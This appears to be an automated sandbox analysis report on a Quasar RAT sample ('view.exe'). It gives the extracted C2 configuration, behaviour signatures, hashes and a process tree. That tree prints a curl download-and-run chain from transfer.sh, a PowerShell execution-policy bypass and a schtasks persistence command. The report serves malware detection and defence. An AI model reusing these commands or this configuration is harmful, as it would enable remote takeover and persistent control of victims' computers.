Analysis

  • max time kernel
    74s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    20/01/2023, 04:31

General

  • Target

    view.exe

  • Size

    547KB

  • MD5

    b0ab211e83a23d58e1322e4d2d6f0a96

  • SHA1

    d568fbcd41e30651cc80ba8a5e9eeab637a99f9e

  • SHA256

    3459ebc48502fb42337647d456681337d303e50a99ca536e010d7cf1ebf6f0f5

  • SHA512

    4a54251fbf23fe3d0e96fcf8d3363e917921644a178387b619367338faa1884134639dd696d55a5a9f06cf167f128d599cc57fb62dba603afc4ebb287d22204d

  • SSDEEP

    3072:SvGyYiSDnt1G5GWp1icKAArDZz4N9GhbkrNEk184:W4wp0yN90QEg

Malware Config

Extracted

Family

quasar

Version

1.4.0

Botnet

Office04

C2

ghcc.duckdns.org:4782

Mutex

a9c03eb7-f3c1-4b9e-a4f7-1962d17a793b

Attributes
  • encryption_key

    B0326395AC2D48856CAE22978A087DF5DCF5816D

  • install_name

    Client.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    Update

  • subdirectory

    SubDir

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar payload 2 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 27 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\view.exe
    "C:\Users\Admin\AppData\Local\Temp\view.exe"
    1⤵
    • Adds Run key to start application
    • Suspicious use of WriteProcessMemory
    PID:4728
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c new.vbs
      2⤵
      • Checks computer location settings
      • Modifies registry class
      • Suspicious use of WriteProcessMemory
      PID:1404
      • C:\Windows\System32\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\new.vbs"
        3⤵
        • Checks computer location settings
        • Suspicious use of WriteProcessMemory
        PID:5072
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c cmd.exe /c curl https://transfer.sh/get/MHXbtP/ss.ps1 --output C:\Users\Admin\AppData\Roaming\rr.ps1
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4408
          • C:\Windows\system32\cmd.exe
            cmd.exe /c curl https://transfer.sh/get/MHXbtP/ss.ps1 --output C:\Users\Admin\AppData\Roaming\rr.ps1
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:4328
            • C:\Windows\system32\curl.exe
              curl https://transfer.sh/get/MHXbtP/ss.ps1 --output C:\Users\Admin\AppData\Roaming\rr.ps1
              6⤵
                PID:1140
          • C:\Windows\System32\cmd.exe
            "C:\Windows\System32\cmd.exe" /c cmd.exe /c powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps1
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:3524
            • C:\Windows\system32\cmd.exe
              cmd.exe /c powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps1
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:2248
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps1
                6⤵
                • Suspicious use of SetThreadContext
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:3920
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  7⤵
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of SetWindowsHookEx
                  • Suspicious use of WriteProcessMemory
                  PID:3740
                  • C:\Windows\SysWOW64\schtasks.exe
                    "schtasks" /create /tn "Update" /sc ONLOGON /tr "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" /rl HIGHEST /f
                    8⤵
                    • Creates scheduled task(s)
                    PID:3160

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\new.vbs

      Filesize

      300.0MB

      MD5

      f7e7099eea0cc25fc49d04cd53c573a1

      SHA1

      3abac9f3f93b0f87ef432d70c40e8ab865157770

      SHA256

      b7f331e83a80b15cc4537324bde827ac9b2ecb990150db4d00d84ee2560cf5be

      SHA512

      c19ddc5e41ed6d485f5df47996f34ff326a782e909bffaa8aa31a3f72fddb33cc7e3709e0cc44b2078668dc83297b42bb3157d6d000a9323ffca6303cd43f074

    • C:\Users\Admin\AppData\Roaming\rr.ps1

      Filesize

      5.1MB

      MD5

      970aca768e68faa580f758a1a379686b

      SHA1

      6a93921485cbd83382eb5a47315b1f0a67bcf684

      SHA256

      6c1e62385d660ca43e024d461154fbb4805e429cdf7850d19510d7f69533739e

      SHA512

      66dd4c5b17978e68c8e0cd2bc4fd35ba5d519447ff34259ec77d11e4253cbfc9955a43915ed3c343f41dc04d97f4302ab6922a823b0e0da44e8893d29ec7cf0f

    • memory/3740-153-0x0000000005C50000-0x0000000005CA0000-memory.dmp

      Filesize

      320KB

    • memory/3740-154-0x0000000005EC0000-0x0000000005F72000-memory.dmp

      Filesize

      712KB

    • memory/3740-149-0x0000000004B90000-0x0000000004C22000-memory.dmp

      Filesize

      584KB

    • memory/3740-152-0x0000000006190000-0x00000000067A8000-memory.dmp

      Filesize

      6.1MB

    • memory/3740-155-0x00000000070A0000-0x0000000007106000-memory.dmp

      Filesize

      408KB

    • memory/3740-150-0x0000000004C30000-0x0000000004C3A000-memory.dmp

      Filesize

      40KB

    • memory/3740-147-0x0000000000340000-0x00000000003C4000-memory.dmp

      Filesize

      528KB

    • memory/3740-148-0x0000000005080000-0x0000000005624000-memory.dmp

      Filesize

      5.6MB

    • memory/3920-146-0x00007FF8330A0000-0x00007FF833B61000-memory.dmp

      Filesize

      10.8MB

    • memory/3920-143-0x00007FF8330A0000-0x00007FF833B61000-memory.dmp

      Filesize

      10.8MB

    • memory/3920-141-0x000001DD21DE0000-0x000001DD21E02000-memory.dmp

      Filesize

      136KB